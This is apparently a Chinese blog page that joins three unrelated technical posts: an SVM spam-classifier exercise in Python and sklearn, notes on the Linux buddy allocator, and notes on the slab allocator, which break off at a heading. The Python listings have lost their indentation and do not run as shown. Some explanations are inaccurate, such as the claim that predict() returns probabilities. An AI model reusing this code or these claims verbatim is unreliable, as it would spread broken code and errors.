0%

实验介绍

在本练习中,您将使用支持向量机 (SVM) 来构建垃圾邮件分类器

  • ex6.m - 练习前半部分的 Octave/MATLAB 脚本
  • ex6data1.mat - 示例数据集 1
  • ex6data2.mat - 示例数据集 2
  • ex6data3.mat - 示例数据集 3
  • svmTrain.m - SVM 训练函数
  • svmPredict.m - SVM 预测函数
  • plotData.m - 绘制二维数据
  • visualizeBoundaryLinear.m - 绘制线性边界
  • visualizeBoundary.m - 绘制非线性边界
  • linearKernel.m - 支持向量机的线性内核
  • [?] gaussianKernel.m - 支持向量机的高斯核
  • [?] dataset3Params.m - 用于 ex6data3.mat 的参数
  • ex6_spam.m - 练习后半部分的 Octave/MATLAB 脚本
  • spamTrain.mat - 用“垃圾邮件训练集”进行训练
  • Test.mat - 垃圾邮件测试集
  • emailSample1.txt - 示例电子邮件 1
  • emailSample2.txt - 示例电子邮件 2
  • spamSample1.txt - 示例电子邮件 3
  • spamSample2.txt - 示例电子邮件 4
  • vocab.txt - 词汇表
  • getVocabList.m - 加载词汇表
  • porterStemmer.m - 词干功能
  • readFile.m - 将文件读入字符串
  • submit.m - 将您的解决方案发送到我们的服务器的提交脚本
  • [?] processEmail.m - 电子邮件预处理
  • [?] emailFeatures.m - 从电子邮件中提取特征

在整个练习中,您将使用脚本 ex6.m,这些脚本为问题设置数据集并调用您将编写的函数,您只需按照本作业中的说明修改其他文件中的功能

Support Vector Machines(支持向量机)

在本练习的前半部分,您将使用支持向量机 (SVM) 和各种示例 2D 数据集,对这些数据集进行试验将帮助您直观地了解 SVM 的工作原理以及如何将高斯核与 SVM 一起使用

在练习的下半部分,您将使用支持向量机来构建垃圾邮件分类器,提供的脚本 ex6.m 将帮助您逐步完成练习的前半部分

Example Dataset 1(示例数据集 1)

我们将从一个可以由线性边界分隔的 2D 示例数据集开始

  • 脚本 ex6.m 将绘制训练数据,在这个数据集中,正例(用 + 表示)和负例(用 o 表示)的位置表明了由间隙表示的自然分离
  • 但是,请注意,在最左侧大约 (0.1, 4.1) 处有一个异常正例 +
  • 在下一部分中,您还将看到这个异常值如何影响 SVM 决策边界

实现过程:

1
2
3
4
5
6
7
8
9
10
11
np.set_printoptions(formatter={'float': '{: 0.6f}'.format}) # 用于控制Python中小数的显示精度

# ===================== 1.读取数据并可视化 =====================
data = scio.loadmat('data/ex6data1.mat') # 以字典格式读取数据
# 分别取出特征数据X和对应的输出Y(都是narray格式)
X = data['X']
Y = data['y'].flatten()
plot_data(X,Y) # 绘制散点图
plt.xlabel('Feature 1')
plt.ylabel('Feature 2')
plt.show()

绘图:

  • 观察数据,发现一条直线就可以区分正负样例
  • 所以,可以直接使用 SVM

利用 SVM 算法进行拟合:

1
2
3
4
5
6
7
8
9
10
11
from sklearn import svm

# ===================== 2.训练SVM使用线性核函数 =====================
# PS:线性核函数,就是不使用核函数的意思

C =100 # 异常点的权重
clf = svm.SVC(C, kernel='linear', tol=1e-3) # 使用sklearn自带的svm函数进行训练
clf.fit(X, Y) # 开始训练
plot_data(X,Y)
vb.visualize_boundary(clf, X, 0, 4.5, 1.5, 5) # 利用训练结果clf绘制决策边界
plt.show()

函数 visualize_boundary 的实现:绘制决策边界

1
2
3
4
5
6
7
def visualize_boundary(clf, X, x_min, x_max, y_min, y_max):
h = .02
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))

Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.contour(xx, yy, Z, levels=[0], colors='k')
  • meshgrid(X , Y):快速生成坐标矩阵 (X , Y)
  • arange(x , y):返回一个有终点和起点的固定步长的排列
  • predict(x , y):返回样本属于每一个类别的概率(SVM 自带的方法)

绘图:

实现并验证高斯核函数:

1
2
3
4
5
6
7
8
9
# ===================== 3.实现并验证高斯核函数 =====================

x1 = np.array([1, 2, 1]) # 实例1
x2 = np.array([0, 4, -1]) # 实例2
sigma = 2
sim = gk.gaussian_kernel(x1, x2, sigma) # 高斯核函数的简单实现

print('Gaussian kernel between x1 = [1, 2, 1], x2 = [0, 4, -1], sigma = {} : {:0.6f}\n'.format(sigma, sim))
print('(for sigma = 2, this value should be about 0.324652')

高斯核函数公式:

代码实现 gaussian_kernel:

1
2
3
4
5
6
7
import numpy as np

def gaussian_kernel(x1, x2, sigma):
x1 = x1.flatten()
x2 = x2.flatten()
sim = np.exp(-sum((x1 - x2) ** 2) / (2 * sigma ** 2))
return sim
  • 可以类比一下高斯核函数公式

Example Dataset 2(示例数据集 2)

ex6.m 中的下一部分将加载并绘制数据集 2,具体过程:

1
2
3
4
5
6
7
8
9
10
11
12
# ===================== 4.读取数据并可视化2 =====================

print('Loading and Visualizing Data ...')
data = scio.loadmat('data/ex6data2.mat')
# 分别取出特征数据X和对应的输出Y(都是narray格式)
X = data['X']
y = data['y'].flatten()
m = y.size
plot_data(X, y) # 绘制散点图
plt.xlabel('Feature 1')
plt.ylabel('Feature 2')
plt.show()

绘图:

  • 从图中可以看出,该数据集没有区分正负样本的线性决策边界
  • 这是一个非线性的决策边界,如果像上一部分一样使用只 SVM,拟合的效果就不好
  • 但是,通过将高斯核与 SVM 结合使用,您将能够学习一个非线性决策边界,该边界可以对数据集执行得相当好

在这部分练习中,您将使用 SVM 进行非线性分类,特别是,您将在非线性可分的数据集上使用具有高斯核的 SVM

要使用 SVM 找到非线性决策边界,我们需要首先实现一个高斯核,您可以将高斯核视为一个相似度函数,用于测量一对示例之间的“距离”

高斯核函数的公式:

接下来就利用“SVM”和“高斯核”绘制一个非线性区域

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# ===================== 5.使用RBF内核训练SVM =====================
# PS:上一部分已经实现内核函数了,但这一部分使用"svm"模块自带的高斯核

print('Training SVM with RFB(Gaussian) Kernel (this may take 1 to 2 minutes) ...')

c = 1
sigma = 0.1

clf = svm.SVC(c, kernel='rbf', gamma=np.power(sigma, -2)) # 同时使用SVM和高斯核
#clf = svm.SVC(c, kernel='linear', tol=1e-3) # 只使用SVM
clf.fit(X, y) # 开始训练

print('Training complete!')

plot_data(X, y)
vb.visualize_boundary(clf, X, 0, 1, .4, 1.0) # 绘制决策边界
plt.show()

绘图:

  • 只使用 SVM 算法:
  • 同时使用 SVM 算法和高斯核函数:

Example Dataset 3(示例数据集 3)

在这部分练习中,您将获得更多关于如何使用具有高斯核的 SVM 的实用技能

ex6.m 的下一部分将加载并显示第三个数据集,您将在此数据集上使用带有高斯核的 SVM

具体过程:

1
2
3
4
5
6
7
8
9
10
11
# ===================== 6.读取数据并可视化3 =====================

print('Loading and Visualizing Data ...')
data = scio.loadmat('data/ex6data3.mat')
X = data['X']
y = data['y'].flatten()
m = y.size
plot_data(X, y)
plt.xlabel('Feature 1')
plt.ylabel('Feature 2')
plt.show()

绘图:

  • 看上去是一条线性的决策边界
  • 不过我们仍然需要使用高斯核

你的任务是使用交叉验证集 Xval, yval 来确定最佳 C 和 sigma(σ)

  • sigma(σ) 过小,会导致方差较大(过拟合)
  • sigma(σ) 过大,会导致偏差较大(欠拟合)
1
2
3
4
5
6
7
8
9
10
11
# ===================== 7.使用RBF内核训练SVM2 =====================

c = 1 # 可变数据1
sigma = 0.1 # 可变数据2

clf = svm.SVC(c, kernel='rbf', gamma=np.power(sigma, -2))
clf.fit(X, y) # 开始训练
plot_data(X, y)
vb.visualize_boundary(clf, X, -.5, .3, -.8, .6)

plt.show()

绘图:

  • c = 1,sigma = 0.1
  • c = 1,sigma = 0.9
  • c = 100,sigma = 0.1
  • c = 100,sigma = 0.9

大体的规律如下:

  • c 越大,模型的拟合程度越高,过大会导致过拟合
  • sigma 越大,决策边界越直,越趋近于“线性核函数”

Spam Classification(垃圾邮件分类)

当今的许多电子邮件服务都提供垃圾邮件过滤器,能够将电子邮件高精度地分类为垃圾邮件和非垃圾邮件

  • 在这部分练习中,您将使用 SVM 构建您自己的垃圾邮件过滤器
  • 您将训练一个分类器来分类给定的电子邮件 x 是垃圾邮件 (y = 1) 还是非垃圾邮件 (y = 0)
  • 特别是,您需要将每封电子邮件转换为一个特征向量 x
  • 练习的以下部分将引导您了解如何从电子邮件构建这样的特征向量,在本练习的其余部分,您将使用脚本 ex6_spam.m
  • 本练习包含的数据集基于 SpamAssassin 公共语料库的一个子集,在本练习中,您将仅使用电子邮件正文(不包括电子邮件标题)

Preprocessing Emails(预处理电子邮件)

在开始执行机器学习任务之前,查看数据集中的示例通常很有见地

  • 上图显示了一个示例电子邮件,其中包含一个 URL、一个电子邮件地址(在末尾)、数字和美元金额,虽然许多电子邮件包含相似类型的实体(例如,数字、其他 URL 或其他电子邮件地址)
  • 但几乎每封电子邮件中的特定实体(例如,特定 URL 或特定金额)都会有所不同
  • 因此,处理电子邮件时常用的一种方法是“规范化”这些值,以便所有 URL 都被视为相同,所有数字都被视为相同等
  • 例如,我们可以将电子邮件中的每个 URL 替换为唯一的字符串 “httpaddr”表示存在 URL
  • 这具有让垃圾邮件分类器根据是否存在任何 URL 而不是特定 URL 是否存在来做出分类决定的效果
  • 这通常会提高垃圾邮件分类器的性能,因为垃圾邮件发送者通常会随机化 URL,因此在新的垃圾邮件中再次看到任何特定 URL 的几率非常小

预测处理的条目如下:

  • 小写:整个电子邮件被转换为小写,因此忽略大写(例如:IndIcaTE 被视为与 Indicate 相同)
  • 剥离 HTML:从电子邮件中删除所有 HTML 标记,许多电子邮件通常带有 HTML 格式,我们删除了所有的 HTML 标签,这样就只剩下内容了
  • 规范化 URL:所有 URL 都替换为文本 “httpaddr”
  • 标准化电子邮件地址:所有电子邮件地址都替换为文本 “emailaddr”
  • 规范化数字:所有数字都替换为文本 “数字”
  • 标准化美元:所有美元符号 ($) 都替换为文本 “美元”
  • 词干:词被简化为词干形式,例如:“discount” 、 “discounts” 、 “discounted” 和 “discounting” 都替换为 “discount”,有时,Stemmer 实际上会从末尾去掉额外的字符,因此“include” 、 “includes” 、 “included” 和 “include” 都替换为 “include”
  • 删除非单词:已删除非单词和标点符号,所有空格(制表符、换行符、空格)都已被修剪为单个空格字符

要使用 SVM 将电子邮件分类为垃圾邮件和非垃圾邮件,您首先需要将每封电子邮件转换为特征向量,在这一部分中,您将为每封电子邮件实施预处理步骤,您应该完成 processEmail.py 中的代码以生成给定电子邮件的单词索引向量

预处理函数 processEmail 的实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import numpy as np
import re
import nltk, nltk.stem.porter

def process_email(email_contents):

# ===================== Preprocess Email =====================
vocab_list = get_vocab_list() # 导入词汇表
word_indices = []
email_contents = email_contents.lower()
email_contents = re.sub('<[^<>]+>', ' ', email_contents)
# 任何数字都被替换为字符串'number'
email_contents = re.sub('[0-9]+', 'number', email_contents)
# 以http或https开头的任何内容都替换为'httpaddr'
email_contents = re.sub('(http|https)://[^\s]*', 'httpaddr', email_contents)
# 中间带“@”的字符串被视为电子邮件 --> 'emailaddr'
email_contents = re.sub('[^\s]+@[^\s]+', 'emailaddr', email_contents)
# '$'符号被替换为'dollar'
email_contents = re.sub('[$]+', 'dollar', email_contents)

# ===================== Tokenize Email =====================
print('==== Processed Email ====')
stemmer = nltk.stem.porter.PorterStemmer() # 英文词干提取算法(Porter stemmer)
#print('email contents : {}'.format(email_contents)) # 输出电子邮件
tokens = re.split('[@$/#.-:&*+=\[\]?!(){\},\'\">_<;% ]', email_contents) # 对电子邮件进行拆分

for token in tokens:
token = re.sub('[^a-zA-Z0-9]', '', token) # 用正则来匹配合适的字符
token = stemmer.stem(token)
vocab_value_list = list(vocab_list.values())
vocab_key_list = list(vocab_list.keys())

if len(token) < 1:
continue

try:
num = vocab_key_list[vocab_value_list.index(token)]
except:
continue

word_indices.append(np.array(num))
print(token)

print('==================')
word_indices = np.array(word_indices) # 从'list'转化为'numpy.array'
return word_indices

def get_vocab_list(): # 导入词汇表
vocab_dict = {}
with open('data/vocab.txt') as f:
for line in f:
(val, key) = line.split()
vocab_dict[int(val)] = key

return vocab_dict

具体实现:

1
2
3
4
5
6
7
8
9
10
# ===================== 1.电子邮件预处理 =====================

print('Preprocessing sample email (emailSample1.txt) ...')

file_contents = open('data/emailSample1.txt', 'r').read()
word_indices = pe.process_email(file_contents)

# Print stats
print('Word Indices: ')
print(word_indices)

Extracting Features from Emails(从电子邮件中提取特征)

您现在应该完成 emailFeatures.m 中的代码,以在给定单词索引的情况下为电子邮件生成特征向量

  • 您现在将实现将每封电子邮件转换为 Rn 中的向量的特征提取,对于本练习,您将在词汇表中使用 n = # 个单词
  • 具体来说,电子邮件的特征 xi(“0” or “1”)对应于字典中的第 i 个单词是否出现在电子邮件中
    • 如果电子邮件中存在第 i 个单词,则 xi = 1
    • 如果电子邮件中不存在第 i 个单词,则 xi = 0
  • 因此,对于典型的电子邮件,此功能看起来像您现在应该完成 emailFeatures.m 中的代码用于生成电子邮件的特征向量,给定单词 indices

特征提取函数 emailFeatures 的实现:

1
2
3
4
5
6
7
8
9
import numpy as np

def email_features(word_indices):
n = 1899
features = np.zeros(n + 1)
for i in range(len(word_indices)):
j = word_indices[i]
features[j]=1;
return features
  • 有点类似于位图
  • word_indices 就是邮件的各个单词提取出来后,在单词表中的位置
  • 创建数组 features(各个条目初始化为“0”),然后把对应位置的值置为“1”

具体过程:

1
2
3
4
5
6
7
8
9
# ===================== 2.特征提取 =====================

print('Extracting Features from sample email (emailSample1.txt) ... ')

features = ef.email_features(word_indices) # 提取特征

# 打印统计数据
print('Length of feature vector: {}'.format(features.size))
print('Number of non-zero entries: {}'.format(np.flatnonzero(features).size))

Training SVM for Spam Classification(为垃圾邮件分类训练 SVM)

完成特征提取功能后,ex6 spam.m 的下一步将加载一个预处理的训练数据集,该数据集将用于训练 SVM 分类器

  • spamTrain.mat 包含 4000 个垃圾邮件和非垃圾邮件的训练示例
  • spamTest.mat 包含 1000 个测试示例
  • 每封原始电子邮件都使用 processEmail 和 emailFeatures 函数进行处理,并转换为向量 x(i)
  • 加载数据集后,ex6 spam.m 将继续训练 SVM 以在垃圾邮件(y=1)和非垃圾邮件(y=0)之间进行分类,训练完成后,您应该看到分类器的训练准确率约为 99.8%,测试准确率约为 98.5%

具体过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# ===================== 3.为垃圾邮件分类训练线性SVM =====================
data = scio.loadmat('data/spamTrain.mat')
X = data['X']
y = data['y'].flatten()

print('Training Linear SVM (Spam Classification)')
print('(this may take 1 to 2 minutes)')

c = 0.1
clf = svm.SVC(c, kernel='linear')
clf.fit(X, y)

p = clf.predict(X)

print('Training Accuracy: {}'.format(np.mean(p == y) * 100))

接下来进行测试:

1
2
3
4
5
6
7
8
9
10
11
# ===================== 4.测试垃圾邮件分类 =====================

data = scio.loadmat('data/spamTest.mat')
Xtest = data['Xtest']
ytest = data['ytest'].flatten()

print('Evaluating the trained linear SVM on a test set ...')

p = clf.predict(Xtest) # 预测SVM的结果

print('Test Accuracy: {}'.format(np.mean(p == ytest) * 100))

Top Predictors for Spam(垃圾邮件的主要预测指标)

为了更好地理解垃圾邮件分类器的工作原理,我们可以检查参数以查看分类器认为哪些词最能预测垃圾邮件

  • ex6_spam.m 的下一步是在分类器中找到具有最大正值的参数(最高频)并显示相应的单词
  • 因此,如果一封电子邮件包含诸如“保证”、“删除”、“美元”和“价格”之类的词(垃圾邮件的高频词汇),它很可能被归类为垃圾邮件

由于我们正在训练的模型是线性 SVM,我们可以检查模型学习的 w 权重,以更好地了解它如何确定电子邮件是否为垃圾邮件,以下代码查找分类器中权重最高的单词,非正式地,分类器“认为”这些词最有可能是垃圾邮件的指标

1
2
3
4
5
6
7
8
# ===================== 5.垃圾邮件的主要预测指标 =====================

vocab_list = pe.get_vocab_list() # 导入词汇表
indices = np.argsort(clf.coef_).flatten()[::-1] # "-1"代表倒置,顺序改为从大到小了
print(indices)

for i in range(15):
print('{} ({:0.6f})'.format(vocab_list[indices[i]], clf.coef_.flatten()[indices[i]]))
  • argsort(arr):返回的是元素值从小到大排序后的索引值的数组

伙伴系统

伙伴关系

伙伴关系的定义为:由一个母实体分成的两个各方面属性一致的两个子实体,这两个子实体就处于伙伴关系

  • 在操作系统分配内存的过程中,一个内存块经常被分成两个大小相等的内存块,这两个大小相等的内存块就处于伙伴关系
  • 它满足3个条件:
    • 两个块具有相同大小
    • 物理地址是连续的
    • 从同一个大块中拆分出来

伙伴系统

伙伴系统(buddy system)是内核中用来管理物理内存的一种算法,Linux2.6 为每个管理区使用不同的伙伴系统,内核空间分为三种区,DMA,NORMAL,HIGHMEM,对于每一种区,都有对应的伙伴算法

  • 我们知道内存中有一些是被内核代码占用,还有一些是被特殊用途所保留,那么剩余的空闲内存都会交给内核内存管理系统来进行统一管理和分配
  • 内核中会把内存按照页来组织分配,随着进程的对内存的申请和释放,系统的内存会不断的区域碎片化
  • 到最后会发现,明明系统还有很多空闲内存,却无法分配出一块连续的内存,这对于系统来说并不是好事

伙伴系统(buddy system)把系统中要管理的物理内存按照页面个数分为了 11 个组,分别对应11种大小不同的连续内存块,每组中的内存块大小都相等,且必须是 2 的 n 次幂 (Pow(2, n)),即 1, 2, 4, 8, 16, 32, 64, 128 … 1024

1
2
3
4
5
6
7
8
9
10
11
/* include\linux\mmzone.h */

#define MAX_ORDER 11

struct zone {
struct free_area free_area[MAX_ORDER]; /* 不同大小的空闲区域 */
}
struct free_area {
struct list_head free_list[MIGRATE_TYPES]; /* 内存块链表连接时只需把内存块的第一个页关联即可(都是连续的) */
unsigned long nr_free; /* 表示这种内存块(包括所有迁移类型)的数量 */
};
  • 那么系统中就存在 2^0~2^10 这么11种大小不同的内存块,对应内存块大小为 4KB ~ 4M 内核用 11 个链表来管理 11 种大小不同的内存块

伙伴分配器的数据结构在逻辑上的表示就像是一个完全二叉树,大概像这样:

  • 当然实际编码过程中并不会使用一个 struct TreeNode 的形式去把二叉树的各个节点用指针连起来,因为是这个树一定是完全二叉树,所以可以使用一个数组来表示树的结构
  • 用这一个数组,就可以表示所有节点的位置信息

当一个页面被等分时,它自己也就不存在了:

位图管理

为了便于页面的维护,将多个页面组成内存块,每个内存块都有 “2的方幂” 个页,方幂的指数被称为阶

在操作内存时,经常将这些内存块分成大小相等的两个块,分成的两个内存块被称为伙伴块,采用 “一位二进制数” 来表示它们的伙伴关系

系统根据该位为 “0” 或位为 “1” 来决定是否使用或者分配该页面块,系统每次分配和回收伙伴块时都要对它们的伙伴位跟 “1” 进行异或运算

  • 刚开始时,父块还没有等分,所以伙伴块不存在(也可以认为是:两个伙伴块都空闲),它们的伙伴位为 “0”
  • 如果需要等分,则把第一块插入下一级,第二块分配出去,异或后得 “1”(只使用了一个块)
  • 如果另一块也被使用,异或后得 “0”(两个块都使用了)
  • 如果前面一块回收了异或后得 “1”
  • 如果另一块也回收了异或后得 “0”

整理一下便是:

  • 当这个位为 “1”,表示其中一块在使用
  • 当这个位为 “0”,表示两个页面块都在使用(一个完整的块不会分为两个空块)

注意:这个 “一位二进制数” 存储在 “位图 map” 中

空闲内存块管理

下图可以展示 free_area 的整体结构:

  • free_area 就是一个数组,存放有许多 free_list
  • 每个 free_list(free_area[x])都有一个 map 位图(用于表示各个伙伴块的关系)
1
2
3
struct list_head {
struct list_head *next, *prev;
};

下图就是一个 free_list(free_area[x])的结构:

  • free_list(free_area[x])用于链接 “2的n次方” 组成的内存块
  • map 中的一个“二进制位”表示两个伙伴块的关系

重要结构体

  • 页(page):一个 page 结构表示一个物理内存页面
  • 区(zone):因为硬件限制,Linux 内核不能把所有的物理内存页统一对待,把属性相同的物理内存页面归结到了一个区中
  • 节点(pglist_data):pglist_data 结构中包含了 zonelist 数组,第一个 zonelist 类型的元素指向本节点内的 zone 数组,第二个 zonelist 类型的元素指向其它节点的 zone 数组,而一个 zone 结构中的 free_area 数组中又挂载着 page 结构

伙伴算法-分配流程

我先从 free_area 的角度继续分析,假如系统需要 4(2x2) 个页面大小的内存块:

  • 该算法首先到 free_area[2] 中查找:
    • 如果链表中有空闲块:就直接从中摘下并分配出去
    • 如果没有:算法将顺着数组向上查找 free_area[3]
      • 如果 free_area[3] 中有空闲块:则将其从链表中摘下,分成等大小的两部分,前 4 个页面作为一个块插入 free_area[2] 的链表头部,后 4 个页面分配出去
      • 如果 free_area[3] 中也没有:就再向上查找 free_area[4]
        • 如果 free_area[4] 中有:就将这 16(2x2x2x2) 个页面等分成两份,前一半的 8 个页挂 free_area[3] 的链表头部,后一半的 8 个页再次等分为 2 个 4 页,前一半挂 free_area[2] 的链表中,后一半分配出去
        • 假如 free_area[4] 也没有:则重复上面的过程,知道到达 free_area 数组的最后,如果还没有则放弃分配
  • free_area 中只存放空闲块,从空闲块的视角来看的话:
    • 从小到大进行查找,优先分配小块
    • 如果没有小块,就等分大块,前半部分插入下一级链表头部,后半部分进行分配
    • 如果后半部分仍然可以等分,就重复进行“等分插链”的操作

伙伴算法-释放流程

内存的释放是分配的逆过程,也可以看作是伙伴的合并过程

  • 当释放一个块时,先在其对应的链表中考查是否有伙伴存在
    • 如果没有伙伴块:就直接把要释放的块挂入链表头
    • 如果有:则从链表中摘下伙伴,合并成一个大块,然后继续考察合并后的块在更大一级链表中是否有伙伴存在,直到不能合并或者已经合并到了最大的块

PS:整个过程中,位图扮演了重要的角色,位图的某一位对应两个互为伙伴的块

  • 为“1”表示其中一块已经分配出去了,为“0”表示两块都都分配出去了
  • 伙伴中无论是分配还是释放都只是相对的位图进行异或操作,释放过程根据位图判断伙伴是否存在
    • 如果对相应位的异或操作得“1”(原本是“0”),代表没有伙伴可以合并
    • 如果异或操作得“0”(原本是“1”),代表伙伴块中的另一个已经空闲,可以进行合并
    • 并且继续按这种方式合并伙伴,直到不能合并为止

Slab分配器

slab的出现

我们知道内核中的物理内存由伙伴系统(buddy system)进行管理,它的分配粒度是以物理页帧(page)为单位的,但内核中有大量的数据结构只需要若干 bytes 的空间,倘若仍按页来分配,势必会造成大量的内存被浪费掉

slab 分配器的出现(而 slub 是 slab 的衍生产物),就是为了解决内核中这些小块内存分配与管理的难题

slab 分配器,把常用的数据结构都看成一个个对象

  • 我们知道 buddy 分配器的分配单元是以页为单位的,然后将不同 order 的空闲物理页帧串成若干链表,分配时从对应链表里取出
  • 而 slab 分配器则是以目标数据结构为单分配单元,且会将目标数据结构提前分配并串成链表,分配时从中取用

从 2.6 内核开始对 slab 分配器的实现添加了两个备选方案 slub 和 slob(用 slub 比较多)

  • slub 就是在之前 slab 上优化后的一个产物,去除了许多臃肿的实现,逐渐会完全替代老的 slab
  • 而 slob 则是一个很轻量级的 slab 实现,代码量不大,官方说适合一些嵌入式设备

重要结构体

这里有个复杂且重要的结构体:struct kmem_cache,即 缓存描述符(缓存器),准确的来说它并不包含实际的缓存空间,而是包含了一些缓存的管理数据,和指向实际缓存空间的指针

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
/* \linux-4.19.26\include\linux\slab_def.h */
struct kmem_cache {
struct array_cache __percpu *cpu_cache; /* 本地高速缓存,每CPU结构对象释放时,优先放入这个本地CPU高速缓存中 */

/* 1) Cache tunables. Protected by slab_mutex */
unsigned int batchcount;
unsigned int limit; /* 本地高速缓存中entry数组中空闲obj的最大数目 */
unsigned int shared; /* CPU共享高速缓存标志,实际地址保存在kmem_cache_node结构中 */
unsigned int size; /* 对象长度+填充字节 */
struct reciprocal_value reciprocal_buffer_size;

/* 2) touched by every alloc & free from the backend */
slab_flags_t flags; /* 属性的flag标志,如果SLAB管理结构放在外部,则CFLAGS_OFF_SLAB置'1' */
unsigned int num; /* 每个slab中obj数量 */

/* 3) cache_grow/shrink */
unsigned int gfporder; /* 每个slab页块的阶(一个slab由2^gfporder个页构) */
gfp_t allocflags; /* 从伙伴系统分配页,补足slab时,页分配的gfp码 */
size_t colour; /* 缓存着色范围 */
unsigned int colour_off; /* 一个cache colour的长度(和一个cache line的大小相同) */

struct kmem_cache *freelist_cache; /* 空闲对象链表放在slab外部时使用,管理用于slab对象管理结构中freelist成员的缓存,也就是又一个新缓存 */
unsigned int freelist_size; /* 空闲对象链表的大小 */
void (*ctor)(void *obj); /* 创建高速缓存时的构造函数指针,一半为null */

/* 4) cache creation/removal */
const char *name; /* slab缓存名字 */
struct list_head list; /* slab缓存描述符双向链表指针 */
int refcount;
int object_size; /* slab中每个obj的大小 */
int align; /* obj对齐字节 */

/* 5) statistics */
#ifdef CONFIG_DEBUG_SLAB
unsigned long num_active;
unsigned long num_allocations;
unsigned long high_mark;
unsigned long grown;
unsigned long reaped;
unsigned long errors;
unsigned long max_freeable;
unsigned long node_allocs;
unsigned long node_frees;
unsigned long node_overflow;
atomic_t allochit;
atomic_t allocmiss;
atomic_t freehit;
atomic_t freemiss;
#ifdef CONFIG_DEBUG_SLAB_LEAK
atomic_t store_user_clean;
#endif
int obj_offset;
#endif /* CONFIG_DEBUG_SLAB */

#ifdef CONFIG_MEMCG
struct memcg_cache_params memcg_params;
#endif
#ifdef CONFIG_KASAN
struct kasan_cache kasan_info;
#endif

#ifdef CONFIG_SLAB_FREELIST_RANDOM
unsigned int *random_seq;
#endif

unsigned int useroffset; /* Usercopy region offset */
unsigned int usersize; /* Usercopy region size */

struct kmem_cache_node *node[MAX_NUMNODES]; /* slab节点链表组,对于NUMA系统中每个节点都会有一个struct kmem_cache_node数据结构 */
};
  • slab cache 中所有 slab 的大小一致,由一个或多个连续页组成(通常为一个page,伙伴系统提供)
  • 每个 slab 中的 obj 大小和数量也是相同的

slab cache 描述符 struct kmem_cache 中除了相关的管理数据外,有两个很重要的成员:

  • struct array_cache __percpu *cpu_cache:
    • cpu_cache 是一个 Per-CPU 数据结构,每个 CPU 独享(相当于函数和它局部变量的关系),用来表示本地 CPU 的 slab cache 对象缓冲池(注意是 slab cache obj 缓冲池不是 slab cache slab 缓冲池)
    • CPU 都有自己的硬件高速缓存,当前 CPU 上释放对象时,这个对象很可能还在 CPU 的硬件高速缓存中,这时使用这个对象的代价是非常小的,不需要重新装载到硬件高速缓存中,离 CPU 又最近,同时还可以减少锁的竞争,尤其是在多个 CPU 同时申请同样 size 或者同个缓存对象时,无需加锁即可操作
    • array_cache中 的 entry 空数组,就是用于保存本地 cpu 刚释放的 obj,所以该数组初始化时为空,只有本地 cpu 释放 slab cache 的 obj 后才会将此 obj 装入到 entry 数组 array_cache 的 entry 成员数组中保存的 obj 数量是由成员 limit 控制的,超过该限制后会将 entry 数组中的 batchcount 个 obj 迁移到对应节点 cpu 共享的空闲对象链表中
    • entry 数组的访问机制是 LIFO(last in fist out),此种设计非常巧妙,能保证本地 cpu 最近释放该 slab cache 的 obj 立马被下一个 slab 内存申请者获取到(有很大概率此 obj 仍然在本地 cpu 的硬件高速缓存中)
  • struct kmem_cache_node *node[MAX_NUMNODES]:
    • slab 缓存会为不同的节点维护一个自己的 slab 链表,用来缓存和管理自己节点的 slab obj,这通过 kmem_cache 中 node 数组成员来实现,node 数组中的每个数组项都为其对应的节点分配了一个 struct kmem_cache_node 结构
    • struct kmem_cache_node 结构定义的变量是一个每 node 变量,相比于 struct array_cache 定义的每 cpu 变量,kmem_cache_node 管理的内存区域粒度更大,因为kmem_cache_node 维护的对象是 slab,而 array_cache 维护的对象是 slab 中的 obj(一个 kmem_cache 可能包含一个或多个 slab,而一个 slab 中可能包含一个或多个 slab obj)
    • 通过下面 struct kmem_cache_node 结构的代码实现我们来分析该结构体如何实现对本地节点指定 slab cache 中所有的 slab 进行管理的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
struct kmem_cache_node {
spinlock_t list_lock;

#ifdef CONFIG_SLAB
struct list_head slabs_partial; /* 该链表中存储的所有slab中只有部分obj是空闲的 */
struct list_head slabs_full; /* 该链表中存储的所有slab中不存在空闲的obj */
struct list_head slabs_free; /* 该链表中存储的所有slab中每个obj都是空闲的 */
unsigned long total_slabs; /* 该节点中此kmem_cache的slab总数 */
unsigned long free_slabs; /* 该节点中此kmem_cache空闲slab总数 */
unsigned long free_objects; /* 该节点中此kmem_cache空闲obj总数 */
unsigned int free_limit; /* 该节点中此kmem_cache中空闲obj数量的上限,多了就会回收到伙伴系统的空闲链表中 */
unsigned int colour_next; /* Per-node cache coloring */
struct array_cache *shared; /* 该节点上所有cpu共享的本地高速缓存 */
struct alien_cache **alien; /* 其他节点上所有cpu共享的本地高速缓存 */
unsigned long next_reap; /* updated without locking */
int free_touched; /* updated without locking */
#endif

#ifdef CONFIG_SLUB
unsigned long nr_partial;
struct list_head partial;
#ifdef CONFIG_SLUB_DEBUG
atomic_long_t nr_slabs;
atomic_long_t total_objects;
struct list_head full;
#endif
#endif

};
  • 由上代码可以看出,struct kmem_cache_node 对于本节点中 slab 的管理主要分了3个链表:
    • 部分空闲 slab 链表(slabs_partial)
    • 全空闲 slab 链表(slabs_free)
    • 非空闲 slab 链表(slabs_full)
  • 单个 slab 可以在不同的链表之间移动,例如当一个 slab 被分配完,就会从 slab_partial 移动到 slabs_full,当一个 slab 中有对象被释放后,就会从 slab_full 再次回到 slab_partial,所有对象都被释放完的话,就会从 slab_partial 移动到 slabs_free
  • struct kmem_cache_node 还会将本地节点中需要节点共享的 slab obj 缓存在它的 shared 成员中,若本地节点向访问其他节点贡献的 slab obj,可以利用 struct kmem_cache_node 中的 alien 成员去获取

slab机制

